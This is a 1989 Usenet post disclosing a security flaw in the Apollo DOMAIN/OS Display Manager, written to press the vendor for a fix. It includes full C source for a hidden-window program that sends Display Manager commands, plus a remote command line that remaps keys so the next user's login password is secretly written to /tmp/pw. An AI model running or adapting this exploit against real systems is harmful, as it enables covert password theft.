Path: utzoo!utgpu!watmath!att!pacbell!ames!mailrus!tut.cis.ohio-state.edu!cs.utexas.edu!uunet!mcvax!tuvie!tugiaik!plipp
From: plipp@tugiaik.UUCP (Peter Lipp)
Newsgroups: comp.sys.apollo
Subject: security bug
Keywords: apollo,domain_os,aegis,display manager
Message-ID: <108@tugiaik.UUCP>
Date: 8 Aug 89 09:21:53 GMT
Organization: none
Lines: 63

__________________________________________________________________

Possible Security Problem with DOMAIN-OS and the Display-Manager
__________________________________________________________________

The following program shall be called rdmc:

/* rdmc.c - execute display manager command */
#include
#include
#include

status_$t status;
pad_$window_desc_t window={0,1000,20,20};
ios_$id_t stream;
void init();

main (argc,argv)
int argc;
char *argv[];
{
    /* create a transcript pad and a window on the display */
    pad_$create_window((char *)0,0,pad_$transcript,1,window,&stream,&status);
    /* hide the window and let it close together with the stream */
    pad_$make_invisible(stream,1,&status);
    pad_$set_auto_close(stream,1,true,&status);
    /* hand the first argument to the display manager as a DM command */
    pad_$dm_cmd(stream,argv[1],strlen(argv[1]),&status);
}

Now log into some machine X from some other machine Y via telnet, crp
or similar and enter the following command:

rdmc "kd cr en;dr;kd cr xc -f '/tmp/pw' ;en;kd cr en ke ke ke"

If no user is currently logged in at the display, the next time some
user logs in, his password will, unnoticed and secretly, be clearly
readable in the file /tmp/pw - wow! Isn't that great - what system
security!

Has this problem been discussed on the net before? Has there been a
proposed solution?

Apollo-Austria has not heard of this problem before. Please put
pressure on Apollo to solve it immediately.

This program has been written by one of our students - who was so kind
to present it and not misuse it. But there might be others.

If you post an answer or similar concerning this posting, please mail
it to me too, because we are not on the news-net.

--
Peter Lipp - Institute for Applied Information Processing
University of Technology, Graz, Austria
plipp@tugiig.uucp - plipp@tugiig.at - mcvax!tuvie!tugiig!plipp